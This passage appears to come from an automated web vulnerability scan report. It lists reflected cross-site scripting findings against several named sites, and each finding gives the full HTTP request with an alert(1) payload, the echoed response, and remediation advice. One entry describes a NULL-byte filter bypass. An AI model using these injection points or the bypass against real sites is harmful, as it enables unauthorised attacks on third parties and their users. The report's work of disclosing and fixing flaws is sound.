<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
                   jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%2fnational-park-trails.aspx%3f6ad8a'-alert(1)-'5b5fbeadc89%3d1',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   n
...[SNIP]...

2.194. http://www.trails.com/recent_reviews.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /recent_reviews.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5acdf'-alert(1)-'647e96911fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recent_reviews.aspx5acdf'-alert(1)-'647e96911fa HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 23145
Expires: Fri, 30 Sep 2011 13:18:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 13:18:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
',
                   jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2frecent_reviews.aspx5acdf'-alert(1)-'647e96911fa',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...

2.195. http://www.trails.com/recent_reviews.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /recent_reviews.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd25e'-alert(1)-'17cea06c3f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recent_reviews.aspx?dd25e'-alert(1)-'17cea06c3f9=1 HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 30 Sep 2011 13:17:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 184717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
om',
                   jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%2frecent_reviews.aspx%3fdd25e'-alert(1)-'17cea06c3f9%3d1',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   n
...[SNIP]...

2.196. http://www.trails.com/tcatalog_trail.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /tcatalog_trail.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e66c'-alert(1)-'09e08e7af5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tcatalog_trail.aspx9e66c'-alert(1)-'09e08e7af5f HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 23145
Expires: Fri, 30 Sep 2011 13:17:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 13:17:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
',
                   jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2ftcatalog_trail.aspx9e66c'-alert(1)-'09e08e7af5f',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...

2.197. http://www.trails.com/tcatalog_trail.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /tcatalog_trail.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb381'-alert(1)-'d261f09fdee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tcatalog_trail.aspx?bb381'-alert(1)-'d261f09fdee=1 HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 30 Sep 2011 13:17:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
om',
                   jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%2ftcatalog_trail.aspx%3fbb381'-alert(1)-'d261f09fdee%3d1',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   n
...[SNIP]...

2.198. http://www.trails.com/trailfinder/browsebymap/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /trailfinder/browsebymap/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4351f'-alert(1)-'ccbc4419657 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trailfinder4351f'-alert(1)-'ccbc4419657/browsebymap/ HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23159
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:17:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
ails.com',
                   jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2ftrailfinder4351f'-alert(1)-'ccbc4419657%2fbrowsebymap%2f',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               us
...[SNIP]...

2.199. http://www.trails.com/trailfinder/browsebymap/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /trailfinder/browsebymap/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3283e'-alert(1)-'b479ae14a0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trailfinder/browsebymap3283e'-alert(1)-'b479ae14a0b/ HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23159
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:17:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
           jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2ftrailfinder%2fbrowsebymap3283e'-alert(1)-'b479ae14a0b%2f',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   na
...[SNIP]...

2.200. http://www.trails.com/trailfinder/browsebymap/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /trailfinder/browsebymap/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80017'-alert(1)-'814db0e1e2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trailfinder/browsebymap/?80017'-alert(1)-'814db0e1e2c=1 HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 30 Sep 2011 13:17:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
       jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%2ftrailfinder%2fbrowsebymap%2f%3f80017'-alert(1)-'814db0e1e2c%3d1',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   n
...[SNIP]...

2.201. http://ad.thewheelof.com/st [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.thewheelof.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96fa2'-alert(1)-'c844be0f41c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=217835 HTTP/1.1
Host: ad.thewheelof.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=96fa2'-alert(1)-'c844be0f41c
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/html; charset=utf-8
Date: Fri, 30 Sep 2011 13:14:08 GMT
Content-Length: 594

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=32&size=728x90&inv_code=217835&referrer=http://www.google.com/search%3Fhl=en%26q=96fa2'-alert(1)-'c844be0f41c&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D32%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D217835">
...[SNIP]...

2.202. http://ad.yieldmanager.com/imp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00c676f'-alert(1)-'09ea5d901c1 was submitted in the Referer HTTP header. This input was echoed as c676f'-alert(1)-'09ea5d901c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /imp?Z=728x90&anmember=32&anprice=&s=217835&_salt=3211644444&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=%00c676f'-alert(1)-'09ea5d901c1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:13:46 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0069.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Fri, 30 Sep 2011 13:13:46 GMT
Pragma: no-cache
Content-Length: 4161
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<span id="10934007">');
//raw JavaScript
document.write('<scr'+'ipt language=\'Javascr'+'ipt1.1\' SRC="http://ad.doubleclick.net/adj/N5664.276969.AUDIENCESCIENCE/B5830468.2;sz=728x
...[SNIP]...
asci_publiid = '299671';
var asci_sectid = '217835';
var asci_advliid = '3534465';
var asci_cid = '10934007';
var asci_p = '0';
var asci_refurl = escape('http://www.google.com/search?hl=en&q=%00c676f'-alert(1)-'09ea5d901c1');
if ( asci_refurl.length >
...[SNIP]...

2.203. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 12ed1<script>alert(1)</script>14082b33a19 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?cb=1317388297065&api_key=6332f8b7316a4d1284e9c1217a367347&callback=bizo.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: 12ed1<script>alert(1)</script>14082b33a19
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Fri, 30 Sep 2011 13:13:22 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=f682fb6a-4760-4bea-84a1-46826f42cd69;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 12ed1<script>alert(1)</script>14082b33a19

2.204. http://www.migratenow.ca/Family-Class-p1c43e0.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.migratenow.ca
Path:   /Family-Class-p1c43e0.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b7e22><script>alert(1)</script>23a8b1363d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Family-Class-p1c43e0.htm HTTP/1.1
Host: www.migratenow.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=b7e22><script>alert(1)</script>23a8b1363d7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQBSTTDR=AGLPHNNCKGFGPKOCLMGEPNML; __utmc=254864660; __utmz=254864660.1317388783.1.1.utmccn=(referral)|utmcsr=mcafeesecure.com|utmcct=/us/forconsumers/mcafee_certified_sites.jsp|utmcmd=referral; __utmb=254864660; __utma=254864660.1975897096.1317388783.1317388783.1317388783.1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:25:46 GMT
Server: Microsoft-IIS/6.0
Hosted-With: GearHost Inc. (www.gearhost.com)
X-Powered-By: ASP.NET
Content-Length: 22978
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Family Class -
...[SNIP]...
<INPUT name=referer type=hidden value=http://www.google.com/search?hl=en&q=b7e22><script>alert(1)</script>23a8b1363d7>
...[SNIP]...

2.205. http://www.migratenow.ca/Provincial-Nomination-p1c42e0.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.migratenow.ca
Path:   /Provincial-Nomination-p1c42e0.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e2bcb><script>alert(1)</script>92b049a4dc1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Provincial-Nomination-p1c42e0.htm HTTP/1.1
Host: www.migratenow.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=e2bcb><script>alert(1)</script>92b049a4dc1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQBSTTDR=AGLPHNNCKGFGPKOCLMGEPNML; __utma=254864660.1975897096.1317388783.1317388783.1317388783.1; __utmb=254864660; __utmc=254864660; __utmz=254864660.1317388783.1.1.utmccn=(referral)|utmcsr=mcafeesecure.com|utmcct=/us/forconsumers/mcafee_certified_sites.jsp|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:23:56 GMT
Server: Microsoft-IIS/6.0
Hosted-With: GearHost Inc. (www.gearhost.com)
X-Powered-By: ASP.NET
Content-Length: 24101
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Provincial Nomi
...[SNIP]...
<INPUT name=referer type=hidden value=http://www.google.com/search?hl=en&q=e2bcb><script>alert(1)</script>92b049a4dc1>
...[SNIP]...

2.206. http://edge.helpserve.com/visitor/index.php [SWIFT_client cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.helpserve.com
Path:   /visitor/index.php

Issue detail

The value of the SWIFT_client cookie is copied into the HTML document as plain text between tags. The payload 744c0<script>alert(1)</script>f57df5bbdea was submitted in the SWIFT_client cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /visitor/index.php?/LiveChat/VisitorUpdate/UpdateFootprint/_time=1317389212781/_randomNumber=53/_url=http%3A%2F%2Fwww.edgetechcorp.com%2F/_isFirstTime=1/_sessionID=1m1ygp96g458yq0vae6u9qt0dphilrkf/_referrer=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D3%26c2%3D302/_resolution=1920x1156/_colorDepth=16/_platform=Win32/_appVersion=5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.186%20Safari%2F535.1/_appName=Netscape/_browserCode=CH/_browserVersion=1/_browserName=Google%20Chrome/_operatingSys=Windows/_pageTitle=Memory%20Upgrades%2C%20Portable%20Hard%20Drives%2C%20Flash%20Cards%2C%20%20%20Flash%20Drives%20from%20EDGE%20Tech%20Corp/_hasNotes=0/_repeatVisit=1/_lastVisitTimeline=0/_lastChatTimeline=0/_isNewSession=1 HTTP/1.1
Host: edge.helpserve.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.edgetechcorp.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_client=744c0<script>alert(1)</script>f57df5bbdea; SWIFT_sessionid80=1m1ygp96g458yq0vae6u9qt0dphilrkf; SWIFT_visitor=a%3A4%3A%7Bs%3A5%3A%22geoip%22%3Bi%3A1%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22sessionid%22%3Bs%3A32%3A%221m1ygp96g458yq0vae6u9qt0dphilrkf%22%3Bs%3A9%3A%22lastvisit%22%3Bi%3A1317389211%3B%7D; SWIFT_visitorsession=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: image/gif
X-Powered-By: PHP/5.3.6
Set-Cookie: SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Sat, 29-Sep-2012 13:27:18 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 30 Sep 2011 13:27:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Cacheable: NO: !beresp.cacheable
Content-Length: 360
Date: Fri, 30 Sep 2011 13:27:18 GMT
X-Varnish: 1026342373
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: standalonehosted8.kayako.net
X-Cache: MISS

